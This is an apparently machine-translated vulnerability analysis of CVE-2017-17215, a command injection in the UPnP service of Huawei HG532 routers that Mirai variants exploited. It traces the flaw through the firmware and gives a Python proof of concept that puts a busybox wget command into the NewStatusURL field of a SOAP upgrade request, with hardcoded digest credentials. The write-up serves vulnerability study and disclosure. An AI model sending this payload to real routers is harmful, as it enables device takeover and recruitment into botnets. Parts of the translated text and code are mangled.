analysis of remote command execution vulnerability in huawei hg532 series router

Posted by punzalan at 2020-02-27

Author: Fenix @ knows English version of Chuangyu 404 laboratory:


Huawei hg532 series router is a high-speed wireless router product for home and small office users.

On November 27, 2017, the check point software technology department reported a remote command execution vulnerability (cve-2017-17215) in Huawei hg532 products [1].

Before the vulnerability was reported, there were a large number of unnoticed exploits of this kind of vulnerability on the Internet, covering many countries around the world. Payload has been identified as an upgraded version of the well-known virus Mirai, okiru / satori. The payload function is very simple. It mainly sends carefully crafted UDP / TCP messages to launch DDoS attacks on the target.

On November 23, 2017, it was known that the zoomeye network probe system of Chuangyu 404 laboratory also captured the payload of the attack.

Vulnerability analysis

Firmware Download

Hg532e version of the public firmware is available online, download address [2]

Download the firmware and extract it directly with binwalk.

The target system is MIPS 32-bit large end architecture.

Vulnerability analysis

According to the check point report [1], the vulnerability point of the remote command execution vulnerability is located in the UPnP service.

UPnP is created by the universal plug and play Forum (UPnP Gamma Forum). The goal of this protocol is to make all kinds of devices in home network (data sharing, communication and entertainment) and company network connect seamlessly with each other, and simplify the realization of related network.

The UPnP program responsible for UPnP service in firmware is directly thrown to IDA.

The vulnerability point is located through the string newstatus URL.


Trace data cross reference

The vulnerabilities are as follows

The definition of the ATP XML getchildnodebyname function is as follows.

The program first parses the soap XML message to get the values of the elements newdownloadurl and newstatusurl. Then the following splicing is carried out, and finally the system() function is called for execution.

snprintf($s0, 0x400, 'upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r %s -d -', NewDownloadURL, NewStatusURL) system($s0)

Upg is an upgrade program of router. Its parameter functions are as follows.


Now we have two command injection points, newdownloadurl and newstatusurl.

NewDownloadURL NewStatusURL
Vulnerability verification

The target system provides the following commands.

Use WGet command for vulnerability test. Send the following message.

import requests headers = { "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669" } data = '''<?xml version="1.0" ?> <s:Envelope xmlns:s="" s:encodingStyle=""> <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"> <NewStatusURL>;/bin/busybox wget -g -l /tmp/1 -r /1;</NewStatusURL> <NewDownloadURL>HUAWEIUPNP</NewDownloadURL> </u:Upgrade> </s:Body> </s:Envelope> ''''',headers=headers,data=data)

As you can see, we successfully received the request on the listening port.

It is worth mentioning that both the UPnP service and the firewall of hg532e router are enabled by default, and the default level of the firewall is low.

By default, access to port 37215 from WAN port will be blocked by firewall, and the vulnerability cannot be exploited.

Protection plan

On November 30, 2017, Huawei officially released a security notice [4], confirming the vulnerability. The following vulnerability mitigation measures are mentioned in the announcement

Yes, no firmware upgrade package was found, so no patch analysis


Reference link

【1】 Check point vulnerability report [2] hg532e firmware download 20hg532e.rar [3] Irish broadband router settpserver command injection [4] Huawei security bulletin

This article was published by seebug paper. If you need to reprint it, please indicate the source. Address: